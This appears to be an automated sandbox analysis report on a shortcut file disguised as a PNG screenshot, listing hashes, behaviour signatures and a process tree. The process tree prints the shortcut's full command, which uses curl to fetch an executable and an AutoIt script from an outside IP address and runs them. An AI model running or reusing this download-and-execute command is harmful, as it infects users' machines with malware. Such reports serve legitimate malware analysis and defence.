Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231025-en
  • resource tags

    arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2023 16:57

General

  • Target

    Screenshot_20_11_2023-4839.png.lnk

  • Size

    1KB

  • MD5

    d3d3ffd5ffa81dcdef3cf7e606562d4c

  • SHA1

    dc86ae5e975f08d86052208dbaf182d55e8aedfc

  • SHA256

    3ee01212c840eaee1d11c78169d1deb7f9fa133cbb12f105918328f36afdd971

  • SHA512

    075e69dd2a59ab7da5eb9e03b1753cd6870b2958c3998887e150cd2182aadfbdd90038fc8b88b49a64a9b7896b002057c73b0b7ae952856b43d8159006f6527e

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Screenshot_20_11_2023-4839.png.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1828
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /min /b ping -n 4 localhost > nul && curl -s -o "C:\Users\Public\Seed.exe" http://45.154.98.21/Seed.exe && curl -s -o "C:\Users\Public\leaf.au3" http://45.154.98.21/leaf.au3 && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3" && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3" && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2668
      • C:\Windows\system32\PING.EXE
        ping -n 4 localhost
        3⤵
        • Runs ping.exe
        PID:2680

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads